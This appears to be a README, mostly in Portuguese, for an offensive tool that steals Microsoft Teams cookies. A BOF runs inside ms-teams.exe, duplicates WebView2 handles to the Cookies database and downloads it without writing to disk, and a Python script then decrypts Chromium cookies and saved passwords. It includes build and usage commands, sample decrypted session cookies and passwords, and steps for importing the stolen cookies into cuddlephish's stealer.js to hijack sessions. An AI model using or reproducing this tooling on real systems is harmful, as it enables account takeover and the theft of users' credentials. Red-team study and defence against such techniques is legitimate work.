
BOF para roubar cookies do Teams
Rouba cookies do Teams, enquanto executa dentro do processo ms-teams.exe. Post relacionado: https://tierzerosecurity.co.nz/2025/11/03/teams-cookies-bof.html
Baseado em: https://blog.randorisec.fr/ms-teams-access-tokens/.
Esta ferramenta é fortemente baseada no Cookie-Monster-BOF.
O BOF extrai a Chave de Criptografia, localiza os processos msedgewebview2.exe com um handle para o arquivo de Cookies, copia o handle e então baixa o arquivo alvo sem gravar em disco.
Depois que os Cookies são baixados, o script de descriptografia em Python (veja abaixo) pode ser usado para extrair esses segredos.
O BOF deve ser executado dentro do processo do Teams ms-teams.exe. O BOF não aceita argumentos.
Garanta que o Mingw-w64 e o make estejam instalados no Linux antes de compilar.
make
Instale os requisitos
pip3 install -r requirements.txt
Uso
python3 decrypt.py -h
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]
Decrypt Chromium cookies and passwords given a key and DB file
options:
-h, --help show this help message and exit
-k KEY, --key KEY Decryption key
-o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
Option to choose
-f FILE, --file FILE Location of the database file
--chrome-aes-key CHROME_AES_KEY
Chrome AES Key
Exemplos: Descriptografar arquivo de Cookies do Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Descriptografar Cookies do Chrome com a Chrome AES Key
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json
Descriptografar arquivo de Cookies do Chrome/Edge e salvar em json
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json
Importe o arquivo JSON de cookies com https://cookie-editor.com/
Descriptografar arquivo de Senhas do Chrome/Edge
python .\decrypt.py -k "\xec\xfc...." -o passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Descriptografar Cookies do Firefox e Credenciais Armazenadas:
https://github.com/lclevy/firepwd
adicionada a opção cuddlephish ao script de descriptografia, que deve suportar o uso do cookie com https://github.com/fkasler/cuddlephish
# Decrypt Cookies
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db
# Clone Project
cd
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish
# Install Dependencies Example on Debian
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install
# Import Cookies
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json
Roubando tokens de acesso do Microsoft Teams em 2025:
https://blog.randorisec.fr/ms-teams-access-tokens/
Cookie-Monster-BOF:
https://github.com/KingOfTheNOPs/cookie-monster
Cookie Webkit Master Key Extractor:
https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Download sem gravar em disco:
https://github.com/fortra/nanodump